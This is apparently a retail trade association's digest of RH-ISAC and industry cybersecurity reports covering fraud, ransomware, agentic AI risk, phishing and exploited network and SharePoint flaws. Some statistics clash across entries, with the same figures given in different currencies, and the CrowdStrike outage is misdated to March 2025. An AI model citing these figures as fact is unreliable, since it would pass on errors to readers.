Cybersecurity

Inside the account fraud economy: Q1 2026 benchmarks for retail
What: Organised fraud groups are increasingly targeting retail accounts and loyalty programmes with advanced verification bypass and synthetic identity techniques, driving a surge in account takeovers and bot-driven attacks.
Why it is important: This escalation reflects a broader industry shift toward more targeted, sophisticated fraud, requiring retailers to strengthen layered defenses and real-time monitoring.
The Q1 2026 RH-ISAC benchmarks reveal a significant transformation in the account fraud landscape, with organized criminal groups leveraging advanced verification bypass and synthetic identity techniques to exploit retail, QSR, airline, and accommodation accounts. Retailers are now facing a surge in account takeovers, loyalty program abuse, and bot-driven attacks, particularly around high-demand products. The professionalisation of fraud services, including KYC and 2FA bypass, has made it increasingly difficult for traditional security measures to keep pace. Macroeconomic pressures, such as inflation and geopolitical instability, have further increased the value of stored credits and loyalty points, making them prime targets for sophisticated fraudsters. As legal and regulatory frameworks struggle to keep up with rapid technological advances, retailers are compelled to implement their own adaptive security strategies, focusing on layered defences, real-time intelligence sharing, and cross-functional collaboration to protect customer trust and business continuity.
IADS Notes: The Q1 2026 RH-ISAC findings align with recent industry reports, such as the May 2026 Retail Dive analysis documenting a shift toward targeted account takeovers and the March 2026 RH-ISAC emphasis on integrating cybersecurity with fraud prevention. The June 2025 Sainsbury’s loyalty programme breach illustrates the vulnerability of digital assets, while the March 2026 and April 2026 articles highlight how rapid AI adoption is outpacing security measures, exposing retailers to new risks. These developments collectively underscore the urgent need for adaptive, layered security and real-time monitoring to sustain customer trust and operational resilience.

The missing security layer in agentic AI in retail
What: The rise of autonomous AI agents in retail is exposing the sector to novel cybersecurity risks that traditional frameworks cannot address.
Why it is important: Addressing these risks is critical for maintaining consumer trust and regulatory compliance in an increasingly digital retail environment.
The integration of agentic AI systems in retail is accelerating, promising significant operational efficiencies and new forms of customer engagement. However, this rapid technological shift is introducing a new class of cybersecurity risks that existing security frameworks are ill-equipped to manage. Autonomous AI agents, capable of making independent decisions and interacting with sensitive data, create vulnerabilities similar to those exploited by malware, increasing the potential for data breaches and system manipulation. As retailers embrace these advanced digital operators, the absence of tailored security protocols heightens the risk of regulatory non-compliance and erodes consumer trust. The sector faces mounting pressure to develop adaptive governance structures and real-time monitoring solutions that can address the unique challenges posed by agentic AI. Without robust security measures, the promise of AI-driven innovation in retail could be undermined by escalating threats, making it imperative for organisations to prioritise security as a foundational element of their digital transformation strategies.
IADS Notes: The rapid adoption of agentic AI in retail is fundamentally transforming operational efficiency and customer experience, but it is also exposing a widening gap between technological innovation and cybersecurity preparedness, as highlighted by RH-ISAC in March 2026. Autonomous AI agents now act in ways that closely resemble malware, introducing new risks that require real-time monitoring and robust governance, as detailed by Harvard Business Review in April 2026. Traditional security frameworks are proving inadequate, prompting urgent calls for new, tailored protocols to address the unique vulnerabilities of agentic AI, as emphasised by RH-ISAC in April 2026. Boards and executive leadership are under increasing pressure to strengthen oversight and ensure compliance with evolving regulations, given the escalating cyber threats from AI-driven innovation, as noted by Harvard Business Review in April 2026. The sector’s vulnerability is further underscored by The Robin Report in August 2025, which described how AI systems are susceptible to manipulation through prompt injection attacks, amplifying existing security risks and demanding a shift in how retailers approach digital risk management.

CISO Benchmark Report 2026
What: Retail CISOs are facing incremental budget growth, rising AI-driven risks, and expanding responsibilities amid persistent security maturity challenges.
Why it is important: The report’s insights confirm that budget constraints, skill shortages, and evolving threats are driving a strategic pivot toward intelligence sharing and robust incident response in retail.
The "CISO Benchmark 2026" report reveals that retail CISOs are navigating a landscape marked by modest increases in cybersecurity budgets, with spending growth often outpaced by the complexity and volume of threats. Artificial intelligence has emerged as both a critical tool and a significant risk, introducing new governance challenges and requiring fresh investment in oversight and controls. Despite technological advancements, staffing levels remain stable, with a focus on leveraging AI to enhance efficiency rather than reduce headcount. The role of the CISO has expanded beyond traditional IT security to encompass broader business risk domains, including third-party risk management, business continuity, and fraud prevention, reflecting the sector’s growing digital footprint and regulatory scrutiny. However, the maturity of security programs in retail continues to lag, with ongoing concerns about data leakage, insider threats, and insufficient controls. These persistent challenges underscore the need for integrated, resilient security strategies that can adapt to evolving threats and maintain consumer trust in an increasingly digital retail environment.
IADS Notes: The "CISO Benchmark 2026" report’s findings are strongly reinforced by recent industry analyses, which consistently highlight the escalating complexity and impact of cyber threats on the retail sector. The sharp rise in sophisticated attacks, as detailed in the March 2026 Unit 42 Global Incident Response Report, has made cybersecurity a core business risk, directly affecting profitability and customer trust. This urgency is echoed in the February 2026 Harvard Business Review, which documents the sector’s strategic shift toward collective resilience and industry-wide collaboration, moving beyond isolated prevention. The evolving responsibilities of CISOs, including the integration of fraud prevention and cybersecurity, are underscored by the March 2026 RH-ISAC article, reflecting the need for cross-functional coordination as digital transformation expands the attack surface. Intelligence sharing and collaborative engagement, as described in the January 2026 RH-ISAC Intelligence Trends Summary, are now central to effective threat response and operational continuity. Persistent challenges such as budget constraints, skill shortages, and lagging security maturity, highlighted in the August 2025 Retail Bulletin and July 2025 CISO Benchmark Report, further validate the report’s emphasis on the necessity of robust, integrated security strategies to sustain growth and maintain consumer trust.

The speed gap: Why AI in retail and hospitality is outpacing security
What: The speed of AI deployment in retail and hospitality is outstripping the development of effective cybersecurity, increasing operational risks.
Why it is important: The trend underscores the increasing risk of sophisticated cyber threats as retailers prioritise rapid AI adoption over robust security.
Retail and hospitality sectors are experiencing a surge in AI adoption, with organizations leveraging advanced technologies to enhance operational efficiency and customer engagement. However, this rapid technological progress is creating a significant gap between innovation and security, as cybersecurity measures struggle to keep pace with the speed of AI deployment. The resulting vulnerabilities expose retailers to new and evolving threats, including sophisticated cyber attacks and novel risks such as prompt injection. Despite the clear benefits of AI-driven innovation, only a small fraction of retailers have achieved mature digital security, leaving the majority susceptible to breaches that can compromise both operations and customer trust. This imbalance is forcing industry leaders to urgently reassess their digital strategies, emphasising the need for robust governance, transparency, and integrated security protocols. As the sector continues to evolve, the challenge remains to balance the pursuit of technological advancement with the imperative to protect sensitive data and maintain operational resilience.
IADS Notes: The rapid adoption of AI in retail and hospitality is fundamentally transforming operational efficiency and customer experience, but it is also exposing a widening gap between technological innovation and cybersecurity readiness. As highlighted by RH-ISAC in March 2026, retailers are deploying AI at unprecedented speed, yet security protocols are struggling to keep pace, creating new vulnerabilities and operational risks. The Bain & Company Technology Report from September 2025 underscores that while 87% of AI-adopting retailers have seen revenue growth, only 18% possess mature digital core security, leaving the sector exposed to high-profile breaches. The Robin Report in August 2025 details how AI integration introduces novel threats such as prompt injection attacks, amplifying existing risks and demanding robust governance. The Financial Times in November 2025 emphasises that the explosive growth of AI-driven commerce is forcing retailers to recalibrate digital strategies and urgently address transparency and responsible governance. Meanwhile, The Retail Bulletin in August 2025 reports a surge in sophisticated cyber threats, with ransomware accounting for 30% of incidents and only a minority of retailers equipped with adequate security, highlighting the urgent need for integrated, proactive security strategies to sustain growth and customer trust.

2026 Unit 42 Global Incident Response Report
What: Retailers globally faced a sharp rise in sophisticated cyber attacks in 2025, with significant operational and financial consequences.
Why it is important: These incidents demonstrate how cybersecurity has become a core business risk, directly impacting profitability and customer trust.
In 2025, the retail sector experienced a marked increase in sophisticated cyber attacks, resulting in substantial operational disruptions and financial losses. Ransomware and third-party breaches emerged as dominant threats, with average losses per ransomware incident reaching $1.4 million and operational downtimes averaging 72 hours. High-profile attacks on major retailers such as M&S, Co-op, and Harrods exposed critical vulnerabilities, with M&S alone suffering a £300 million profit impact and a £700 million market value loss. These events have driven up cyber insurance premiums and underscored the inadequacy of existing digital security frameworks, as only a small fraction of retailers possess mature core security. The frequency and severity of these incidents have transformed cybersecurity from a technical concern into a central business risk, compelling retailers to prioritize resilience, proactive monitoring, and robust incident response strategies to safeguard both operations and customer trust in an increasingly hostile digital environment.
IADS Notes: The 2026 Unit 42 Global Incident Response Report’s findings on the scale and sophistication of cyber incidents in retail are strongly echoed by recent industry analyses. RH-ISAC’s April 2025 report revealed that ransomware now accounts for 30% of all retail cyber incidents, with third-party breaches responsible for 41% and average losses per ransomware attack reaching $1.4 million, while operational downtimes average 72 hours. Retail Week’s August 2025 coverage of attacks on major UK retailers such as M&S, Co-op, and Harrods highlighted the sector’s acute vulnerabilities, with M&S alone suffering a £300 million profit impact and a £700 million market value loss, driving a 10% rise in cyber insurance premiums. The Retail Bulletin in August 2025 noted that only 18% of retailers possess mature digital core security, and high-profile breaches have resulted in significant financial and operational disruption. Inside Retail in May 2025 emphasised that coordinated attacks have transformed cybersecurity from an IT concern to a core business risk, directly affecting market value and customer trust. By July 2025, Retail Week reported that 80% of top UK retailers faced at least one critical cyber threat, underscoring the urgent need for improved visibility, proactive monitoring, and industry-wide resilience.

Why CISOs should care about fraud
What: CISOs are increasingly responsible for integrating cybersecurity and fraud prevention to protect retail organisations from evolving threats.
Why it is important: Coordinated cybersecurity and fraud prevention strategies are critical for protecting retail operations and customer trust, as seen in recent market developments.
As the retail sector faces a surge in sophisticated cyber threats and fraud, the role of the Chief Information Security Officer (CISO) is rapidly evolving. No longer limited to traditional IT security, CISOs are now expected to lead integrated efforts that bridge the gap between cybersecurity and fraud prevention. This shift is driven by the growing complexity of digital retail environments, where omnichannel strategies and digital transformation have expanded the attack surface and exposed new vulnerabilities. The consequences of fraud incidents are not only financial but also deeply impact brand reputation and customer trust. To address these risks, retailers are moving toward cross-functional collaboration, uniting IT, security, and fraud management teams to build comprehensive, layered defenses. Regulatory pressures and the need for real-time intelligence sharing further underscore the importance of a unified approach. By embracing this expanded mandate, CISOs are positioning themselves at the forefront of retail risk management, ensuring that organisations can respond swiftly and effectively to the evolving threat landscape.
IADS Notes: The convergence of cybersecurity and fraud prevention has become a defining challenge for the retail sector, as CISOs are increasingly called upon to address not only technical threats but also the broader spectrum of financial and reputational risks posed by fraud. Recent analyses, such as the February 2026 Harvard Business Review, underscore a strategic pivot from isolated prevention to collective resilience and industry-wide collaboration, reflecting the sector’s response to escalating cyber threats. The August 2025 Retail Bulletin and May 2025 BCG reports highlight how digital transformation and omnichannel expansion have expanded the attack surface, exposing critical gaps in cross-functional coordination between IT, security, and business teams. This fragmentation has left retailers vulnerable to sophisticated attacks, with incidents like the UNC3944 campaign in May 2025 demonstrating the urgent need for comprehensive, layered defences. Meanwhile, the October 2025 RH-ISAC initiative illustrates the sector’s shift toward intelligence-driven, regulatory-aligned fraud prevention strategies, emphasising the importance of coordinated action and real-time information sharing. Collectively, these developments signal a new era in which CISOs must lead integrated efforts to protect both operations and customer trust.

Phishing on the edge of the web and mobile using QR codes
What: QR code phishing attacks are increasingly targeting retail environments, threatening both customer trust and operational security.
Why it is important: The rise in QR code phishing underscores the urgent need for enhanced cybersecurity measures and staff training in retail.
The growing integration of QR codes into retail operations has brought both convenience and new security challenges. As retailers leverage QR codes for payments, promotions, and customer engagement, cybercriminals are exploiting these tools to launch sophisticated phishing attacks. These attacks not only compromise sensitive customer data but also undermine trust in retail brands, potentially leading to significant reputational and financial damage. The rapid pace of digital transformation in retail has expanded the attack surface, making it imperative for retailers to adopt comprehensive cybersecurity strategies. Enhanced staff training and customer awareness are now essential to mitigate the risks associated with QR code phishing. Regulatory pressures are also mounting, as increased incidents of data breaches prompt calls for stricter compliance and data protection measures. Ultimately, the sector must balance the benefits of digital innovation with the need for robust security protocols to protect both operations and customer relationships.
IADS Notes: The proliferation of QR codes in retail, while enhancing customer engagement and streamlining payments, has simultaneously introduced new vectors for phishing and cyberattacks, as highlighted in recent industry analyses. The sector’s rapid digital transformation, detailed in The Retail Bulletin (August 2025), has expanded the attack surface, making retailers increasingly vulnerable to sophisticated threats such as QR code phishing. Inside Retail (May 2025) and RH-ISAC (April 2025) both underscore how these evolving tactics erode customer trust and expose systemic weaknesses, with phishing campaigns rising sharply and third-party breaches accounting for a significant portion of incidents. Retail Week (August 2025) further illustrates the operational and reputational fallout, noting a marked decline in customer recommendation rates following major breaches. In response, Google Cloud (May 2025) emphasises the necessity of comprehensive staff training and robust authentication protocols to counteract advanced social engineering and ransomware attacks. Collectively, these sources demonstrate that as retailers embrace digital tools like QR codes, they must also prioritise cybersecurity awareness, resilience, and regulatory compliance to safeguard both their operations and customer relationships.

Intelligence Trends Summary: Q4 2025
What: Intelligence sharing and collaborative engagement are transforming how retailers address cybersecurity threats and operational risks.
Why it is important: This shift reflects a broader industry trend toward integrated security strategies and rapid response.
Retailers are increasingly recognising the value of intelligence sharing and collaborative engagement to combat the growing complexity of cybersecurity threats. The RH-ISAC Intelligence Trends Summary illustrates how information exchanges, requests for information, and industry surveys are providing actionable insights that help organisations identify and respond to emerging risks more effectively. As cyberattacks become more sophisticated, retailers are moving beyond isolated efforts, instead fostering partnerships and collective action to strengthen their defenses. This evolution is driving a shift from traditional prevention-focused models to integrated strategies that emphasise resilience, rapid recovery, and the protection of customer trust. Intelligence-driven decision-making is now influencing operational priorities, with many retailers investing in new technologies and cross-industry collaborations to stay ahead of adversaries. These developments underscore the sector’s commitment to safeguarding both business continuity and consumer confidence in an increasingly digital retail landscape.
IADS Notes: The RH-ISAC Intelligence Trends Summary is reinforced by findings from The Retail Bulletin in August 2025, which reported a surge in sophisticated cyber threats and emphasised the need for integrated security strategies and rapid recovery to maintain customer trust. RH-ISAC’s own April 2025 report highlighted the importance of intelligence-driven solutions and industry collaboration for improved threat detection and response. Retail Week’s coverage in August 2025 detailed the sector’s vulnerability to cyberattacks, especially through third-party providers, and stressed the necessity of coordinated responses. In July 2025, Retail Week documented Co-op’s strategic cybersecurity partnership following major breaches, illustrating the sector’s move toward collaborative protection. Inside Retail’s June 2025 analysis further demonstrated how resilience and rapid recovery have become competitive differentiators, marking a shift from prevention to holistic business continuity and customer trust.

Advanced malware targeting F5 BIG-IP appliances through backdoor
What: Advanced malware targeting F5 BIG-IP devices is allowing attackers to pivot from edge appliances into internal retail networks, increasing the risk of operational disruption and data theft.
Why it is important: The exploitation of widely used network devices exposes critical vulnerabilities in retail infrastructure, demanding urgent investment in security and monitoring.
The recent exploitation of F5 BIG-IP appliances by the UNC5221 threat group, utilising the BRICKSTORM backdoor, represents a significant escalation in the cyber risks facing the retail sector. This sophisticated malware is engineered for stealth and persistence, establishing covert command channels that closely mimic legitimate web traffic and enabling attackers to move laterally from edge devices into internal networks. Such tactics make detection and response particularly challenging for retail cybersecurity teams, increasing the risk of data exfiltration, credential theft, and operational disruption. The theft of F5 source code and vulnerability data further amplifies the threat, as attackers can craft highly targeted exploits against retailers relying on these devices for critical network management. With 80% of leading UK retailers already exposed to critical cyber threats, and third-party breaches accounting for a substantial share of incidents, the sector faces mounting pressure to invest in integrated security strategies, rapid incident response, and continuous monitoring of all networked devices to safeguard operations and customer trust.
IADS Notes: RH-ISAC’s April 2025 report highlights the prevalence of supply chain and third-party breaches in retail, while The Retail Bulletin and Retail Week (August 2025) document the surge in sophisticated attacks exploiting network devices. Trustwave’s May 2025 analysis and Retail Week’s July 2025 findings further underscore the widespread vulnerabilities and the urgent need for robust, proactive security measures across the retail ecosystem.

2025 Holiday season cyber threat trends report
What: Holiday 2025 is marked by record retail sales, shifting consumer behaviours, and escalating cybersecurity threats impacting the retail, hospitality, and travel sectors.
Why it is important: Rising cyber threats and changing consumer behaviours during peak season reinforce the need for cross-sector collaboration and investment in digital infrastructure.
The 2025 holiday season presents a complex landscape for the retail industry, characterised by record-breaking sales figures and significant shifts in consumer behavior. While overall spending remains strong, with forecasts reaching up to $1.62 trillion, there is a notable divergence among age groups, as younger consumers, particularly Gen Z, are reducing their holiday budgets. This evolving consumer landscape is further complicated by the increasing integration of digital channels, with ecommerce and mobile commerce playing a pivotal role in driving sales. However, this digital transformation has also heightened the sector’s vulnerability to cyber threats, as evidenced by a surge in high-profile breaches and ransomware attacks targeting major retailers. The convergence of retail, hospitality, and travel sectors amplifies both the opportunities and risks, necessitating greater collaboration to address shared challenges. As retailers adapt to these dynamics, the focus on operational resilience, robust cybersecurity measures, and innovative customer engagement strategies becomes essential to sustaining growth and maintaining consumer trust during the most critical sales period of the year.
IADS Notes: Deloitte’s September 2025 forecast projects holiday retail sales to reach $1.62 trillion, while PwC’s September 2025 report highlights a generational divide with Gen Z reducing holiday spending. The Retail Bulletin and Retail Week, both in August 2025, detail a surge in cyberattacks and the urgent need for stronger digital infrastructure across the sector. Visa’s February 2025 analysis underscores the increasing convergence of retail, hospitality, and travel, emphasising the necessity of cross-sector collaboration and resilience to address evolving risks and consumer expectations.

Cybercriminals exploit remote monitoring tools to infiltrate shipping and logistics networks
What: Cybercriminals are exploiting legitimate remote monitoring tools to infiltrate logistics networks, enabling large-scale cargo theft and disrupting retail supply chains.
Why it is important: The use of trusted IT tools for cyber-enabled theft exposes critical vulnerabilities in retail supply chains, demanding urgent investment in security and risk management.
A financially motivated threat group has been targeting the freight and logistics industry since June 2025, orchestrating a sophisticated campaign that merges cyber intrusion with physical cargo theft. By distributing legitimate remote monitoring and management (RMM) software such as ScreenConnect and SimpleHelp through spear-phishing and compromised load board accounts, attackers gain undetected access to logistics networks. Once inside, they manipulate core systems, delete legitimate freight bookings, and coordinate the fraudulent transport of high-value goods, mainly food and beverage products. This approach allows them to bypass traditional security measures, as RMM tools are often whitelisted within organizations. The campaign’s indiscriminate nature affects both small carriers and large supply chain providers, highlighting the vulnerability of the entire retail ecosystem. The blending of cyber and physical tactics demonstrates a deep understanding of logistics workflows and underscores the urgent need for retailers and their partners to reassess security protocols, invest in robust risk management, and foster cross-sector collaboration to protect inventory and maintain operational continuity.
IADS Notes: RH-ISAC’s April 2025 report details critical cyber threats to retail and hospitality, with third-party breaches accounting for 41% of incidents and average ransomware losses of $1.4 million. Retail Week and Inside Retail, in August and May 2025 respectively, highlight major attacks on supply chain providers and the resulting operational and financial impacts. The December 2024 ransomware attack on Blue Yonder further illustrates the widespread disruption cyber-enabled threats can cause across global retail logistics networks.

RH -ISAC Cybercriminals exploit remote monitoring tools to infiltrate shipping and logistics networks
RH -ISAC Cybercriminals exploit remote monitoring tools to infiltrate shipping and logistics networks
What: Cybercriminals are exploiting legitimate remote monitoring tools to infiltrate logistics networks, enabling large-scale cargo theft and disrupting retail supply chains.
Why it is important: The use of trusted IT tools for cyber-enabled theft exposes critical vulnerabilities in retail supply chains, demanding urgent investment in security and risk management.
A financially motivated threat group has been targeting the freight and logistics industry since June 2025, orchestrating a sophisticated campaign that merges cyber intrusion with physical cargo theft. By distributing legitimate remote monitoring and management (RMM) software such as ScreenConnect and SimpleHelp through spear-phishing and compromised load board accounts, attackers gain undetected access to logistics networks. Once inside, they manipulate core systems, delete legitimate freight bookings, and coordinate the fraudulent transport of high-value goods, mainly food and beverage products. This approach allows them to bypass traditional security measures, as RMM tools are often whitelisted within organizations. The campaign’s indiscriminate nature affects both small carriers and large supply chain providers, highlighting the vulnerability of the entire retail ecosystem. The blending of cyber and physical tactics demonstrates a deep understanding of logistics workflows and underscores the urgent need for retailers and their partners to reassess security protocols, invest in robust risk management, and foster cross-sector collaboration to protect inventory and maintain operational continuity.
IADS Notes: RH-ISAC’s April 2025 report details critical cyber threats to retail and hospitality, with third-party breaches accounting for 41% of incidents and average ransomware losses of $1.4 million. Retail Week and Inside Retail, in August and May 2025 respectively, highlight major attacks on supply chain providers and the resulting operational and financial impacts. The December 2024 ransomware attack on Blue Yonder further illustrates the widespread disruption cyber-enabled threats can cause across global retail logistics networks.

RH -ISAC 2025 Holiday season cyber threat trends report
RH -ISAC 2025 Holiday season cyber threat trends report
What: Holiday 2025 is marked by record retail sales, shifting consumer behaviours, and escalating cybersecurity threats impacting the retail, hospitality, and travel sectors.
Why it is important: Rising cyber threats and changing consumer behaviours during peak season reinforce the need for cross-sector collaboration and investment in digital infrastructure.
The 2025 holiday season presents a complex landscape for the retail industry, characterised by record-breaking sales figures and significant shifts in consumer behavior. While overall spending remains strong, with forecasts reaching up to $1.62 trillion, there is a notable divergence among age groups, as younger consumers, particularly Gen Z, are reducing their holiday budgets. This evolving consumer landscape is further complicated by the increasing integration of digital channels, with ecommerce and mobile commerce playing a pivotal role in driving sales. However, this digital transformation has also heightened the sector’s vulnerability to cyber threats, as evidenced by a surge in high-profile breaches and ransomware attacks targeting major retailers. The convergence of retail, hospitality, and travel sectors amplifies both the opportunities and risks, necessitating greater collaboration to address shared challenges. As retailers adapt to these dynamics, the focus on operational resilience, robust cybersecurity measures, and innovative customer engagement strategies becomes essential to sustaining growth and maintaining consumer trust during the most critical sales period of the year.
IADS Notes: Deloitte’s September 2025 forecast projects holiday retail sales to reach $1.62 trillion, while PwC’s September 2025 report highlights a generational divide with Gen Z reducing holiday spending. The Retail Bulletin and Retail Week, both in August 2025, detail a surge in cyberattacks and the urgent need for stronger digital infrastructure across the sector. Visa’s February 2025 analysis underscores the increasing convergence of retail, hospitality, and travel, emphasising the necessity of cross-sector collaboration and resilience to address evolving risks and consumer expectations.

RH-ISAC Trade Association Partners Meeting
The IADS attended RH-ISAC’s Trade Association Partners meeting, part of a new meeting series for trade association partners to collaborate on cybersecurity issues. Beginning from August 2025, this meeting takes place every two months. Partners discuss cybersecurity policy issues and updates, recent RH-ISAC reports and resources for members, and threat trend briefings.
This document presents a brief recap of the RH-ISAC Trade Association Partners meeting.

CISA and NCSC release directives to address multiple Cisco platforms exploited by threat actors
What: Advanced malware targeting Cisco platforms has triggered emergency directives from US and UK authorities, highlighting critical risks for retailers relying on these systems.
Why it is important: The coordinated response by CISA and NCSC reflects the growing regulatory and operational pressure on retailers to address evolving cyber threats and safeguard business continuity.
The coordinated emergency directives from CISA and the NCSC in response to active exploitation of zero-day vulnerabilities in Cisco networking devices mark a critical escalation in the cyber threat landscape for the retail sector. These vulnerabilities, exploited by sophisticated malware such as RayInitiator and LINE VIPER, expose retailers to heightened risks of network compromise, data exfiltration, and operational disruption. The urgency of the directives, which call for immediate disconnection of obsolete devices and rapid deployment of security updates, highlights the sector’s dependence on robust IT infrastructure and the severe consequences of both malicious attacks and technical failures. Recent industry data reveals that only a minority of retailers have mature digital core security, while high-profile breaches and outages have resulted in substantial financial losses and increased cyber insurance premiums. The retail industry’s response is shifting from basic prevention to comprehensive, resilience-driven strategies, including strategic partnerships and enhanced incident response, to address the evolving sophisticati
IADS Notes: The recent CISA and NCSC directives echo the findings from RH-ISAC in April 2025, which reported a surge in ransomware, phishing, and supply chain attacks, with third-party breaches accounting for 41% of incidents and average ransomware losses reaching $1.4 million. The catastrophic $5.4 billion Crowdstrike outage in March 2025, as detailed by Inside Retail, underscores the sector’s reliance on resilient IT infrastructure and rapid recovery. The Retail Bulletin’s August 2025 analysis found only 18% of retailers have mature digital core security, while high-profile breaches at M&S and Co-op, reported by Inside Retail in May 2025, have driven a 10% rise in cyber insurance premiums and forced a shift toward resilience-focused strategies. Retail Week’s July 2025 coverage of Co-op’s cybersecurity partnership highlights the industry’s move toward collaborative, proactive investment in cybersecurity.

RH-ISAC: Microsoft warns of active exploitation of SharePoint via ToolShell zero-day
What: Microsoft identifies active exploitation of SharePoint's ToolShell zero-day vulnerability, enabling unauthenticated attackers to gain full remote control of retail servers and extract cryptographic secrets.
Why it is important: The timing of this threat is especially significant as retailers struggle with mounting cyber insurance costs and recovery from recent high-profile breaches, potentially creating a perfect storm for the industry.
Microsoft has uncovered widespread exploitation of a critical SharePoint vulnerability chain known as ToolShell (CVE-2025-53770), which enables unauthenticated attackers to compromise on-premises servers. The vulnerability, demonstrated publicly on social media, allows attackers to bypass authentication through a specific HTTP Referer header manipulation during POST requests. Once access is gained, attackers can extract the SharePoint server's MachineKey configuration, including the crucial ValidationKey, which can then be used to craft valid payloads for arbitrary command execution without administrative credentials. This zero-day exploit poses a particular threat to retail and hospitality sectors, where SharePoint is extensively used for internal collaboration, document management, and customer-facing portals. The potential for complete compromise of critical internal data, intellectual property theft, and operational workflow disruption has prompted Microsoft and CISA to issue urgent warnings, with patches now available for affected versions.
IADS Notes: The emergence of the ToolShell SharePoint vulnerability in July 2025 represents a critical escalation in retail cybersecurity threats, following a year of unprecedented incidents. In April 2025, M&S's GBP 700 million market value loss from a cyber attack demonstrated how digital vulnerabilities can severely impact retail operations. The incident's connection to third-party suppliers mirrors the current SharePoint exploit's potential to compromise entire retail networks through a single entry point. This risk is particularly concerning given that March 2025 saw a single security update failure cause GBP 5.4 billion in losses across Fortune 500 companies. The retail sector's vulnerability to such threats has already driven a 10% increase in cyber insurance premiums by May 2025, while industry data from April 2025 shows ransomware accounting for 30% of retail security incidents. With 41% of breaches now occurring through third-party providers, this unauthenticated SharePoint exploit presents an unprecedented risk to retail organizations' operational integrity and data security.
RH-ISAC: 2025 CISO Benchmark Report
What: Global CISO survey reveals critical security gaps in retail sector, with 82% of companies lacking strong digital core security maturity while facing increased ransomware and supply chain threats.
Why it is important: As recent attacks on major retailers demonstrate, the findings highlight an urgent need to strengthen cybersecurity foundations, with ransomware and supply chain vulnerabilities now directly impacting market valuations and customer trust.
The 2025 CISO Benchmark Report reveals significant vulnerabilities in retail cybersecurity infrastructure, with only 18% of companies achieving frontrunner status in digital core security maturity. The survey of 171 CISOs identifies ransomware (70%) and supply chain attacks (58%) as the primary security risks, while budget constraints (71%) and competing IT priorities (69%) emerge as major challenges. Business continuity has become the top cybersecurity priority, rising four places from 2024, reflecting the sector's growing focus on operational resilience. The report highlights a significant shift in security workforce composition, with contractors comprising 52% of InfoSec teams, rising to 60% among frontrunners. Despite these challenges, the sector shows promising developments in NIST Framework adoption, with scores rising 25% since 2024 and frontrunners outperforming peers by 12%. The findings emphasise the critical need for retailers to secure their digital core while balancing rapid technological advancement with robust security measures.
IADS Notes: The 2025 CISO Benchmark Report's findings are starkly validated by recent events in the retail sector. The report's emphasis on ransomware as the top security risk (70% of respondents) was demonstrated by the devastating Marks & Spencer attack in April 2025, which wiped £700 million off their market value. The importance of supply chain security, cited by 58% of respondents, was highlighted when both Harrods and Co-op suffered breaches through third-party vulnerabilities in May 2025, with Co-op's incident affecting up to 20 million customers. The report's revelation that 82% of companies lack strong security maturity aligns with the March 2025 Crowdstrike incident, where a single security update failure resulted in £5.4 billion in losses across Fortune 500 companies. These incidents have transformed the cyber insurance landscape, driving a 10% increase in premiums across the UK retail sector, while demonstrating the report's key finding that business continuity has become the top cybersecurity priority.

RH-ISAC: Sainsbury’s rewards programme targeted by malicious actor for monetary gain
What: Cybercriminals target Sainsbury's loyalty programme members through unauthorised access and point redemption scheme.
Why it is important: This incident reveals a critical security challenge for retailers as loyalty programmes evolve from simple point-collection systems to valuable digital assets requiring sophisticated protection measures.
Sainsbury's Nectar loyalty programme members are experiencing a significant surge in points theft, with one customer reporting the loss of two years' worth of accumulated points. This follows an earlier investigation that uncovered GBP 63,000 worth of stolen Nectar points over a one-year period, prompting the implementation of a "lock" feature for all accounts. The primary attack method involves unauthorised access and rapid redemption of points at unfamiliar locations, suggesting the use of credential stuffing, phishing, or security vulnerability exploitation. While Nectar maintains that only a small proportion of accounts are affected and highlights protective measures like the "Spend Lock" feature, the recurring incidents indicate an ongoing targeted campaign against one of Europe's largest loyalty programmes. Security experts are particularly concerned about the timing of these attacks during peak accumulation periods like Christmas.
IADS Notes: The Sainsbury's Nectar points theft incident in June 2025 aligns with a broader pattern of sophisticated cyber attacks targeting retail loyalty programs. This follows May 2025's revelation of a complex cybercrime supply chain specifically targeting retail loyalty programmes, where criminals sell stolen credentials for as little as GBP 5. The timing is particularly significant as it coincides with industry data showing ransomware accounting for 30% of retail security incidents, with average losses reaching GBP 1.4 million per attack. The vulnerability of loyalty programs has become increasingly critical as retailers expand their digital engagement strategies, while the Co-op's recent cyber attack affecting 20 million customers demonstrates the scale of potential breaches in major retail loyalty systems.

Stolen logins, lost trust: The hidden supply chain behind account takeovers in retail & hospitality
What: Account takeover attacks have evolved into a sophisticated cybercrime supply chain targeting retail loyalty programmes and e-commerce platforms, with criminals selling stolen credentials and session cookies for £5-20.
Why it is important: The emergence of this organized criminal marketplace directly threatens the digital transformation efforts of retailers, with recent incidents showing how stolen credentials can lead to millions in losses through loyalty point theft, fraudulent transactions, and damaged customer trust.
The cybercrime ecosystem has evolved into a sophisticated supply chain that systematically targets retail and hospitality businesses through account takeover (ATO) attacks. With an alarming 28% annual growth in exposed credentials, this underground economy operates through a well-structured network of initial access brokers, who sell stolen information and active session cookies for as little as £5. The threat is particularly acute for retail loyalty programmes, which often lack robust multi-factor authentication while containing valuable, cash-equivalent points. E-commerce platforms face similar vulnerabilities, as stored payment methods and customer preferences become lucrative targets for fraudsters. The impact extends beyond immediate financial losses, affecting customer trust and operational stability. Particularly concerning is the criminals' ability to bypass traditional security measures through session hijacking, where stolen cookies enable unauthorized access without triggering standard security alerts. To combat these threats, retailers must implement a layered defence strategy, including shorter cookie durations, proactive session monitoring, and adaptive authentication measures for high-risk accounts.
IADS Notes: The article's warnings about account takeover (ATO) threats are starkly validated by recent cyber incidents across the retail sector. In April 2025, Marks & Spencer fell victim to the Scattered Spider hacking group, resulting in a £700 million market value loss and highlighting how sophisticated cybercrime networks can paralyse major retailers. This was followed by attacks on Harrods and Co-op in May 2025, with the latter exposing data of 20 million customers, demonstrating the scale of potential breaches. The financial impact has been severe, with industry data from April 2025 showing ransomware accounting for 30% of retail security incidents and average losses reaching £1.4 million per attack. The ripple effect has transformed the cyber insurance landscape, driving a 10% increase in premiums across the UK retail sector. These incidents underscore the article's emphasis on the cybercrime supply chain, as demonstrated by the December 2024 Blue Yonder ransomware attack that affected over 3,000 retailers worldwide, showing how criminals can exploit interconnected retail systems for maximum impact.

Uncovering critical cyber threats to retail and hospitality
What: A comprehensive analysis of cyber threats in retail reveals critical vulnerabilities across ransomware, phishing, and supply chain security, with third-party breaches accounting for 41% of reported incidents and average losses reaching USD 1.4 million per ransomware attack.
Why it is important: As retail operations become increasingly digitised and interconnected, understanding and addressing these cybersecurity vulnerabilities is crucial for protecting both business operations and customer trust in an industry that relies heavily on seamless digital transactions.
